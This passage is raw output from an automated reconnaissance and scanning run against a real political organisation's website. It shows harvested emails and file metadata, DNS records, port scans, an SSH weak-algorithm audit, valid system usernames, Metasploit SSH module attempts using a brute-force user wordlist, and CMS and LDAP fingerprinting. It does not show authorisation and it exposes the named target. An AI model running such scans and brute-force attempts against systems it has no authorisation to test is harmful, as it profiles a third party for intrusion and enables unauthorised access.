  620. Acrobat PDFWriter 5.0 para Windows NT
  621. Moción FA Pobreza Cero.doc - Microsoft Word
  622. PScript5.dll Version 5.2
  623. ofi solicitud mocion - Microsoft Word
  624. programa torrevieja def - Microsoft Word
  625. Programa Hoyo - Microsoft Word
  626. Programa de Ardales - Microsoft Word
  627. Programa Guareña - Microsoft Word
  628. NOTA RUEDA DE PRENSA.doc - Microsoft Word
  629. ---------------------------------------------------------------------------------------------------------------------------------------
  630.  
  631. [+] List of e-mails found:
  632. --------------------------------------------------------------------------------------------------------------------------------------
  633. euskalerria@falange-autentica.org
  634. vegabaja@falange-autentica.org
  635. vegabaja@falange
  636. comunicacion@falange-
  637. ntic@s
  638. n@falange-
  639. ---------------------------------------------------------------------------------------------------------------------------------------
  640. #######################################################################################################################################
  641.  
  642. Sublist3r
  647.  
  648. # Coded By Ahmed Aboul-Ela - @aboul3la
  649.  
  650. [-] Enumerating subdomains now for falange-autentica.es
  651. [-] verbosity is enabled, will show the subdomains results in realtime
  652. [-] Searching now in Baidu..
  653. [-] Searching now in Yahoo..
  654. [-] Searching now in Google..
  655. [-] Searching now in Bing..
  656. [-] Searching now in Ask..
  657. [-] Searching now in Netcraft..
  658. [-] Searching now in DNSdumpster..
  659. [-] Searching now in Virustotal..
  660. [-] Searching now in ThreatCrowd..
  661. [-] Searching now in SSL Certificates..
  662. [-] Searching now in PassiveDNS..
  663. SSL Certificates: www.falange-autentica.es
  664. Virustotal: www.falange-autentica.es
  665. [!] Error: Google probably now is blocking our requests
  666. [~] Finished now the Google Enumeration ...
  667. [-] Saving results to file: /usr/share/sniper/loot/falange-autentica.es/domains/domains-falange-autentica.es.txt
  668. [-] Total Unique Subdomains Found: 1
  669. www.falange-autentica.es
  670. #######################################################################################################################################
  671. www.falange-autentica.es,91.121.2.184
  672. falange-autentica.es,91.121.2.184
  673. mail.falange-autentica.es,91.121.2.184
  674. smtp.falange-autentica.es,193.70.18.144
  675. #######################################################################################################################################
  676. [*] Processing domain falange-autentica.es
  677. [+] Getting nameservers
  678. 213.251.188.150 - dns106.ovh.net
  679. 213.251.128.150 - ns106.ovh.net
  680. [-] Zone transfer failed
  681.  
  682. [+] TXT records found
  683. "v=spf1 ip4:46.105.219.212 ~all"
  684. "google-site-verification=XeCXnycOOchTyn4oLnoD2WYHlYWJFP_sTsHT9CVGEoE"
  685. "v=spf1 a mx ip4:91.121.2.184 ~all"
  686.  
  687. [*] Scanning falange-autentica.es for A records
  688. 91.121.2.184 - mail.falange-autentica.es
  689. 193.70.18.144 - smtp.falange-autentica.es
  690. 91.121.2.184 - falange-autentica.es
  691. 91.121.2.184 - www.falange-autentica.es
  692. #######################################################################################################################################
  693. [*] Found SPF record:
  694. [*] v=spf1 a mx ip4:91.121.2.184 ~all
  695. [*] SPF record contains an All item: ~all
  696. [*] Found DMARC record:
  697. [*] v=DMARC1; p=quarantine; rua=mailto:admin@falange-autentica.es; ruf=mailto:admin@falange-autentica.es; sp=quarantine
  698. [-] DMARC policy set to quarantine
  699. [*] Aggregate reports will be sent: mailto:admin@falange-autentica.es
  700. [*] Forensics reports will be sent: mailto:admin@falange-autentica.es
  701. [-] Spoofing not possible for falange-autentica.es
  702. #######################################################################################################################################
  703. aquatone discover v0.5.0 - by @michenriksen
  709.  
  710. Identifying nameservers for falange-autentica.es... Done
  711. Using nameservers:
  712.  
  713. - 213.251.188.150
  714. - 213.251.128.150
  715.  
  716. Checking for wildcard DNS... Done
  717.  
  718. Running collector: Threat Crowd... Done (0 hosts)
  719. Running collector: DNSDB... Error
  720. -> DNSDB returned unexpected response code: 503
  721. Running collector: Netcraft... Done (0 hosts)
  722. Running collector: PublicWWW... Done (0 hosts)
  723. Running collector: Censys... Skipped
  724. -> Key 'censys_secret' has not been set
  725. Running collector: Wayback Machine... Done (4 hosts)
  726. Running collector: PTRArchive... Error
  727. -> PTRArchive returned unexpected response code: 502
  728. Running collector: PassiveTotal... Skipped
  729. -> Key 'passivetotal_key' has not been set
  730. Running collector: Shodan... Skipped
  731. -> Key 'shodan' has not been set
  732. Running collector: Riddler... Skipped
  733. -> Key 'riddler_username' has not been set
  734. Running collector: VirusTotal... Skipped
  735. -> Key 'virustotal' has not been set
  736. Running collector: Dictionary... Done (0 hosts)
  737. Running collector: HackerTarget... Done (1 host)
  738. Running collector: Google Transparency Report... Done (1 host)
  739. Running collector: Certificate Search... Done (1 host)
  740.  
  741. Resolving 4 unique hosts...
  742. 91.121.2.184 falange-autentica.es
  743. 91.121.2.184 mail.falange-autentica.es
  744. 91.121.2.184 www.falange-autentica.es
  745.  
  746. Found subnets:
  747.  
  748. - 91.121.2.0-255 : 3 hosts
  749.  
  750. Wrote 3 hosts to:
  751.  
  752. - file:///root/aquatone/falange-autentica.es/hosts.txt
  753. - file:///root/aquatone/falange-autentica.es/hosts.json
  754. aquatone takeover v0.5.0 - by @michenriksen
  760.  
  761. Loaded 3 hosts from /root/aquatone/falange-autentica.es/hosts.json
  762. Loaded 25 domain takeover detectors
  763.  
  764. Identifying nameservers for falange-autentica.es... Done
  765. Using nameservers:
  766.  
  767. - 213.251.188.150
  768. - 213.251.128.150
  769.  
  770. Checking hosts for domain takeover vulnerabilities...
  771.  
  772. Finished checking hosts:
  773.  
  774. - Vulnerable : 0
  775. - Not Vulnerable : 3
  776.  
  777. Wrote 0 potential subdomain takeovers to:
  778.  
  779. - file:///root/aquatone/falange-autentica.es/takeovers.json
  780.  
  781. aquatone scan v0.5.0 - by @michenriksen
  787.  
  788. Loaded 3 hosts from /root/aquatone/falange-autentica.es/hosts.json
  789.  
  790. Probing 2 ports...
  791. 80/tcp 91.121.2.184 falange-autentica.es, mail.falange-autentica.es, www.falange-autentica.es
  792. 443/tcp 91.121.2.184 falange-autentica.es, mail.falange-autentica.es, www.falange-autentica.es
  793.  
  794. Wrote open ports to file:///root/aquatone/falange-autentica.es/open_ports.txt
  795. Wrote URLs to file:///root/aquatone/falange-autentica.es/urls.txt
  796. aquatone gather v0.5.0 - by @michenriksen
  802.  
  803. Processing 6 pages...
  804.  
  805. Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
  806. #######################################################################################################################################
  807. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:17 EST
  808. Nmap scan report for falange-autentica.es (91.121.2.184)
  809. Host is up (0.11s latency).
  810. Not shown: 465 filtered ports, 3 closed ports
  811. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  812. PORT STATE SERVICE
  813. 22/tcp open ssh
  814. 80/tcp open http
  815. 389/tcp open ldap
  816. 443/tcp open https
  817. 465/tcp open smtps
  818. 993/tcp open imaps
  819. 7071/tcp open iwg1
  820. 8080/tcp open http-proxy
  821. #######################################################################################################################################
  822. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:17 EST
  823. Nmap scan report for falange-autentica.es (91.121.2.184)
  824. Host is up (0.10s latency).
  825. Not shown: 2 filtered ports
  826. PORT STATE SERVICE
  827. 53/udp open|filtered domain
  828. 67/udp open|filtered dhcps
  829. 68/udp open|filtered dhcpc
  830. 69/udp open|filtered tftp
  831. 88/udp open|filtered kerberos-sec
  832. 123/udp open|filtered ntp
  833. 139/udp open|filtered netbios-ssn
  834. 161/udp open|filtered snmp
  835. 162/udp open|filtered snmptrap
  836. 389/udp open|filtered ldap
  837. 520/udp open|filtered route
  838. 2049/udp open|filtered nfs
  839. #######################################################################################################################################
  840. # general
  841. (gen) banner: SSH-2.0-OpenSSH_5.3
  842. (gen) software: OpenSSH 5.3
  843. (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
  844. (gen) compression: enabled (zlib@openssh.com)
  845.  
  846. # key exchange algorithms
  847. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
  848. `- [info] available since OpenSSH 4.4
  849. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  850. `- [warn] using weak hashing algorithm
  851. `- [info] available since OpenSSH 2.3.0
  852. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
  853. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
  854. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  855. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
  856. `- [warn] using small 1024-bit modulus
  857. `- [warn] using weak hashing algorithm
  858. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  859.  
  860. # host-key algorithms
  861. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
  862. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
  863. `- [warn] using small 1024-bit modulus
  864. `- [warn] using weak random number generator could reveal the key
  865. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  866.  
  867. # encryption algorithms (ciphers)
  868. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  869. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
  870. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  871. (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  872. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  873. `- [warn] using weak cipher
  874. `- [info] available since OpenSSH 4.2
  875. (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  876. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  877. `- [warn] using weak cipher
  878. `- [info] available since OpenSSH 4.2
  879. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  880. `- [warn] using weak cipher mode
  881. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  882. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  883. `- [warn] using weak cipher
  884. `- [warn] using weak cipher mode
  885. `- [warn] using small 64-bit block size
  886. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  887. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  888. `- [fail] disabled since Dropbear SSH 0.53
  889. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  890. `- [warn] using weak cipher mode
  891. `- [warn] using small 64-bit block size
  892. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  893. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  894. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  895. `- [warn] using weak cipher mode
  896. `- [warn] using small 64-bit block size
  897. `- [info] available since OpenSSH 2.1.0
  898. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  899. `- [warn] using weak cipher mode
  900. `- [info] available since OpenSSH 2.3.0
  901. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  902. `- [warn] using weak cipher mode
  903. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
  904. (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  905. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  906. `- [warn] using weak cipher
  907. `- [info] available since OpenSSH 2.1.0
  908. (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  909. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  910. `- [warn] using weak cipher mode
  911. `- [info] available since OpenSSH 2.3.0
  912.  
  913. # message authentication code algorithms
  914. (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  915. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  916. `- [warn] using encrypt-and-MAC mode
  917. `- [warn] using weak hashing algorithm
  918. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  919. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
  920. `- [warn] using weak hashing algorithm
  921. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  922. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
  923. `- [warn] using small 64-bit tag size
  924. `- [info] available since OpenSSH 4.7
  925. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
  926. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  927. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
  928. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  929. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  930. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  931. `- [warn] using encrypt-and-MAC mode
  932. `- [info] available since OpenSSH 2.5.0
  933. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  934. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  935. `- [warn] using encrypt-and-MAC mode
  936. `- [info] available since OpenSSH 2.1.0
  937. (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  938. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  939. `- [warn] using encrypt-and-MAC mode
  940. `- [warn] using weak hashing algorithm
  941. `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
  942. (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  943. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  944. `- [warn] using encrypt-and-MAC mode
  945. `- [warn] using weak hashing algorithm
  946. `- [info] available since OpenSSH 2.5.0
  947.  
  948. # algorithm recommendations (for OpenSSH 5.3)
  949. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
  950. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
  951. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
  952. (rec) -ssh-dss -- key algorithm to remove
  953. (rec) -arcfour -- enc algorithm to remove
  954. (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
  955. (rec) -blowfish-cbc -- enc algorithm to remove
  956. (rec) -3des-cbc -- enc algorithm to remove
  957. (rec) -aes256-cbc -- enc algorithm to remove
  958. (rec) -arcfour256 -- enc algorithm to remove
  959. (rec) -cast128-cbc -- enc algorithm to remove
  960. (rec) -aes192-cbc -- enc algorithm to remove
  961. (rec) -arcfour128 -- enc algorithm to remove
  962. (rec) -aes128-cbc -- enc algorithm to remove
  963. (rec) -hmac-md5-96 -- mac algorithm to remove
  964. (rec) -hmac-ripemd160 -- mac algorithm to remove
  965. (rec) -hmac-sha1-96 -- mac algorithm to remove
  966. (rec) -umac-64@openssh.com -- mac algorithm to remove
  967. (rec) -hmac-md5 -- mac algorithm to remove
  968. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
  969. (rec) -hmac-sha1 -- mac algorithm to remove
  970. #######################################################################################################################################
  971. ftp is a valid user!
  972. mail is a valid user!
  973. mysql is a valid user!
  974. nobody is a valid user!
  975. postfix is a valid user!
  976. root is a valid user!
  977. #######################################################################################################################################
  978.  
  979. libssh scanner 1.0.4
  980. #######################################################################################################################################
  981. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:18 EST
  982. NSE: [ssh-run] Failed to specify credentials and command to run.
  983. Nmap scan report for falange-autentica.es (91.121.2.184)
  984. Host is up (0.12s latency).
  985.  
  986. PORT STATE SERVICE VERSION
  987. 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
  988. | ssh-auth-methods:
  989. | Supported authentication methods:
  990. | publickey
  991. | gssapi-keyex
  992. |_ gssapi-with-mic
  993. |_ssh-brute: Password authentication not allowed
  994. | ssh-hostkey:
  995. | 1024 e4:7e:99:a4:23:fd:8c:a3:e7:a5:1f:21:8c:e8:68:0f (DSA)
  996. |_ 2048 cf:fd:6c:82:51:78:63:3c:c0:33:e0:ab:05:9e:af:07 (RSA)
  997. | ssh-publickey-acceptance:
  998. |_ Accepted Public Keys: No public keys accepted
  999. |_ssh-run: Failed to specify credentials and command to run.
  1000. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1001. Aggressive OS guesses: Linux 2.6.32 (92%), Linux 3.10 (92%), Linux 3.2 (92%), Linux 3.4 - 3.10 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%), Linux 2.6.32 - 3.1 (90%), Linux 3.11 (90%)
  1002. No exact OS matches for host (test conditions non-ideal).
  1003. Network Distance: 8 hops
  1004.  
  1005. TRACEROUTE (using port 22/tcp)
  1006. HOP RTT ADDRESS
  1007. 1 104.09 ms 10.251.200.1
  1008. 2 119.51 ms 185.94.189.129
  1009. 3 ...
  1010. 4 116.12 ms 94.23.122.146
  1011. 5 ...
  1012. 6 115.18 ms 91.121.131.219
  1013. 7 ...
  1014. 8 115.33 ms 91.121.2.184
  1015.  
  1016. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1017. Nmap done: 1 IP address (1 host up) scanned in 53.09 seconds
  1018. #######################################################################################################################################
  1019. USER_FILE => /brutex/wordlists/simple-users.txt
  1020. RHOSTS => falange-autentica.es
  1021. RHOST => falange-autentica.es
  1022. [+] 91.121.2.184:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:5.3 service.protocol=ssh fingerprint_db=ssh.banner )
  1023. [*] falange-autentica.es:22 - Scanned 1 of 1 hosts (100% complete)
  1024. [*] Auxiliary module execution completed
  1025. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
  1026. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, KEY_FILE.
  1027. [+] 91.121.2.184:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:5.3 service.protocol=ssh fingerprint_db=ssh.banner )
  1028. [*] falange-autentica.es:22 - Scanned 1 of 1 hosts (100% complete)
  1029. [*] Auxiliary module execution completed
  1030. + -- --=[Port 23 closed... skipping.
  1031. + -- --=[Port 25 closed... skipping.
  1032. + -- --=[Port 53 closed... skipping.
  1033. + -- --=[Port 67 opened... running tests...
  1034. #######################################################################################################################################
  1035. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:19 EST
  1036. Nmap scan report for falange-autentica.es (91.121.2.184)
  1037. Host is up (0.12s latency).
  1038.  
  1039. PORT STATE SERVICE VERSION
  1040. 67/udp open|filtered dhcps
  1041. |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
  1042. Too many fingerprints match this host to give specific OS details
  1043. Network Distance: 8 hops
  1044.  
  1045. TRACEROUTE (using proto 1/icmp)
  1046. HOP RTT ADDRESS
  1047. 1 106.02 ms 10.251.200.1
  1048. 2 106.89 ms 185.94.189.129
  1049. 3 ...
  1050. 4 117.80 ms 94.23.122.146
  1051. 5 ...
  1052. 6 116.36 ms 91.121.131.219
  1053. 7 ...
  1054. 8 116.40 ms 91.121.2.184
  1055.  
  1056. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1057. Nmap done: 1 IP address (1 host up) scanned in 139.59 seconds
  1058. + -- --=[Port 68 opened... running tests...
  1059. #######################################################################################################################################
  1060. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:22 EST
  1061. Nmap scan report for falange-autentica.es (91.121.2.184)
  1062. Host is up (0.11s latency).
  1063.  
  1064. PORT STATE SERVICE VERSION
  1065. 68/udp open|filtered dhcpc
  1066. Too many fingerprints match this host to give specific OS details
  1067. Network Distance: 8 hops
  1068.  
  1069. TRACEROUTE (using proto 1/icmp)
  1070. HOP RTT ADDRESS
  1071. 1 103.13 ms 10.251.200.1
  1072. 2 103.18 ms 185.94.189.129
  1073. 3 ...
  1074. 4 161.84 ms 94.23.122.146
  1075. 5 ...
  1076. 6 113.40 ms 91.121.131.219
  1077. 7 ...
  1078. 8 113.53 ms 91.121.2.184
  1079. #######################################################################################################################################
  1080. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:24 EST
  1081. Nmap scan report for falange-autentica.es (91.121.2.184)
  1082. Host is up (0.11s latency).
  1083.  
  1084. PORT STATE SERVICE VERSION
  1085. 69/udp open|filtered tftp
  1086. Too many fingerprints match this host to give specific OS details
  1087. Network Distance: 8 hops
  1088.  
  1089. TRACEROUTE (using proto 1/icmp)
  1090. HOP RTT ADDRESS
  1091. 1 103.34 ms 10.251.200.1
  1092. 2 106.55 ms 185.94.189.129
  1093. 3 ...
  1094. 4 114.77 ms 94.23.122.146
  1095. 5 ...
  1096. 6 113.85 ms 91.121.131.219
  1097. 7 ...
  1098. 8 113.89 ms 91.121.2.184
  1099. #######################################################################################################################################
  1100.  
  1108.  
  1109. WAFW00F - Web Application Firewall Detection Tool
  1110.  
  1111. By Sandro Gauci && Wendel G. Henrique
  1112.  
  1113. Checking http://falange-autentica.es
  1114. The site http://falange-autentica.es is behind a ModSecurity (OWASP CRS)
  1115. Number of requests: 11
  1116. #######################################################################################################################################
  1117.  
  1118. wig - WebApp Information Gatherer
  1119.  
  1120.  
  1121. Scanning http://falange-autentica.es...
  1122. ___________________________________________ SITE INFO ___________________________________________
  1123. IP Title
  1124. 91.121.2.184 Falange Auténtica
  1125.  
  1126. ____________________________________________ VERSION ____________________________________________
  1127. Name Versions Type
  1128. Joomla! 3 | 3.3.1 | 3.3.1.rc | 3.3.2 | 3.3.2.rc | 3.3.3 | 3.3.4 CMS
  1129. 3.3.5 | 3.3.6 | 3.4.0 | 3.4.0-alpha | 3.4.0-beta1
  1130. 3.4.0-beta2 | 3.4.0-beta3 | 3.4.0-rc | 3.4.1 | 3.4.1-rc
  1131. 3.4.1-rc2 | 3.4.2 | 3.4.2-rc | 3.4.3 | 3.4.4 | 3.4.4-rc
  1132. 3.4.4-rc2 | 3.4.5 | 3.4.6 | 3.4.7 | 3.4.8 | 3.4.8-rc | 3.5.0
  1133. 3.5.0-beta | 3.5.0-beta2 | 3.5.0-beta3 | 3.5.0-beta4
  1134. 3.5.0-beta5 | 3.5.0-rc | 3.5.0-rc2 | 3.5.0-rc3 | 3.5.0-rc4
  1135. 3.5.1 | 3.5.1-rc | 3.5.1-rc2 | 3.6.0 | 3.6.0-alpha
  1136. 3.6.0-beta1 | 3.6.0-beta2 | 3.6.0-rc | 3.6.0-rc2 | 3.6.1
  1137. 3.6.1-rc1 | 3.6.1-rc2 | 3.6.2 | 3.6.3-rc1
  1138. Apache Platform
  1139. PHP 5.6.14 Platform
  1140. openSUSE tumbleweed OS
  1141.  
  1142. __________________________________________ INTERESTING __________________________________________
  1143. URL Note Type
  1144. /robots.txt robots.txt index Interesting
  1145.  
  1146. _____________________________________________ TOOLS _____________________________________________
  1147. Name Link Software
  1148. CMSmap https://github.com/Dionach/CMSmap Joomla!
  1149. joomscan http://sourceforge.net/projects/joomscan/ Joomla!
  1150.  
  1151. _________________________________________________________________________________________________
  1152. Time: 53.5 sec Urls: 413 Fingerprints: 40401
  1153. #######################################################################################################################################
  1154. HTTP/1.1 200 OK
  1155. Date: Wed, 07 Nov 2018 22:28:27 GMT
  1156. Server: Apache
  1157. X-Powered-By: PHP/5.6.14
  1158. Set-Cookie: 2b5581ae182de78f0daf6795785a3ed8=ck1qlfviu1d285h49t57no86j5; path=/; HttpOnly
  1159. Expires: Wed, 17 Aug 2005 00:00:00 GMT
  1160. Last-Modified: Wed, 07 Nov 2018 22:28:28 GMT
  1161. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  1162. Pragma: no-cache
  1163. Vary: Accept-Encoding
  1164. Content-Type: text/html; charset=utf-8
  1165. #######################################################################################################################################
  1166. ---------------------------------------------------------------------------------------------------------------------------------------
  1167.  
  1168. [ ! ] Starting SCANNER INURLBR 2.1 at [07-11-2018 17:29:07]
  1169. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  1170. It is the end user's responsibility to obey all applicable local, state and federal laws.
  1171. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1172.  
  1173. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-falange-autentica.es.txt ]
  1174. [ INFO ][ DORK ]::[ site:falange-autentica.es ]
  1175. [ INFO ][ SEARCHING ]:: {
  1176. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.by ]
  1177.  
  1178. [ INFO ][ SEARCHING ]::
  1179. -[:::]
  1180. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  1181.  
  1182. [ INFO ][ SEARCHING ]::
  1183. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1184. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.co.nz ID: 010479943387663786936:wjwf2xkhfmq ]
  1185.  
  1186. [ INFO ][ SEARCHING ]::
  1187. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1188.  
  1189. [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
  1190. [ INFO ] Not a satisfactory result was found!
  1191.  
  1192.  
  1193. [ INFO ] [ Shutting down ]
  1194. [ INFO ] [ End of process INURLBR at [07-11-2018 17:29:14]
  1195. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  1196. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-falange-autentica.es.txt ]
  1200. #######################################################################################################################################
  1201. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:29 EST
  1202. Nmap scan report for falange-autentica.es (91.121.2.184)
  1203. Host is up (0.12s latency).
  1204.  
  1205. PORT STATE SERVICE VERSION
  1206. 123/udp open|filtered ntp
  1207. Too many fingerprints match this host to give specific OS details
  1208. Network Distance: 8 hops
  1209.  
  1210. TRACEROUTE (using proto 1/icmp)
  1211. HOP RTT ADDRESS
  1212. 1 106.48 ms 10.251.200.1
  1213. 2 116.08 ms 185.94.189.129
  1214. 3 ...
  1215. 4 117.59 ms 94.23.122.146
  1216. 5 ...
  1217. 6 116.58 ms 91.121.131.219
  1218. 7 ...
  1219. 8 116.68 ms 91.121.2.184
  1220. #######################################################################################################################################
  1221. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:31 EST
  1222. Nmap scan report for falange-autentica.es (91.121.2.184)
  1223. Host is up (0.12s latency).
  1224.  
  1225. PORT STATE SERVICE VERSION
  1226. 161/tcp filtered snmp
  1227. 161/udp open|filtered snmp
  1228. Too many fingerprints match this host to give specific OS details
  1229. Network Distance: 8 hops
  1230.  
  1231. TRACEROUTE (using proto 1/icmp)
  1232. HOP RTT ADDRESS
  1233. 1 103.86 ms 10.251.200.1
  1234. 2 104.06 ms 185.94.189.129
  1235. 3 ...
  1236. 4 115.46 ms 94.23.122.146
  1237. 5 ...
  1238. 6 114.19 ms 91.121.131.219
  1239. 7 ...
  1240. 8 179.63 ms 91.121.2.184
  1241. #######################################################################################################################################
  1242. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:34 EST
  1243. Nmap scan report for falange-autentica.es (91.121.2.184)
  1244. Host is up (0.11s latency).
  1245.  
  1246. PORT STATE SERVICE VERSION
  1247. 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
  1248. | ldap-rootdse:
  1249. | LDAP Results
  1250. | <ROOT>
  1251. | namingContexts:
  1252. | supportedControl: 1.3.6.1.4.1.4203.666.5.18
  1253. | supportedControl: 1.3.6.1.4.1.4203.1.9.1.1
  1254. | supportedControl: 1.3.6.1.4.1.21008.108.63.1
  1255. | supportedControl: 2.16.840.1.113730.3.4.18
  1256. | supportedControl: 2.16.840.1.113730.3.4.2
  1257. | supportedControl: 1.3.6.1.4.1.4203.666.5.12
  1258. | supportedControl: 1.3.6.1.4.1.4203.666.5.2
  1259. | supportedControl: 1.3.6.1.4.1.4203.1.10.1
  1260. | supportedControl: 1.2.840.113556.1.4.1340
  1261. | supportedControl: 1.2.840.113556.1.4.805
  1262. | supportedControl: 1.2.840.113556.1.4.1413
  1263. | supportedControl: 1.3.6.1.4.1.4203.666.5.15
  1264. | supportedControl: 1.2.840.113556.1.4.1339
  1265. | supportedControl: 1.2.840.113556.1.4.319
  1266. | supportedControl: 1.2.826.0.1.3344810.2.3
  1267. | supportedControl: 1.3.6.1.1.13.2
  1268. | supportedControl: 1.3.6.1.1.13.1
  1269. | supportedControl: 1.3.6.1.1.12
  1270. | supportedExtension: 1.3.6.1.4.1.1466.20037
  1271. | supportedExtension: 1.3.6.1.4.1.4203.1.11.1
  1272. | supportedExtension: 1.3.6.1.4.1.4203.1.11.3
  1273. | supportedExtension: 1.3.6.1.1.8
  1274. | supportedLDAPVersion: 3
  1275. | supportedSASLMechanisms: SCRAM-SHA-1
  1276. | supportedSASLMechanisms: GSSAPI
  1277. | supportedSASLMechanisms: DIGEST-MD5
  1278. | supportedSASLMechanisms: OTP
  1279. | supportedSASLMechanisms: CRAM-MD5
  1280. |_ subschemaSubentry: cn=Subschema
  1281. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
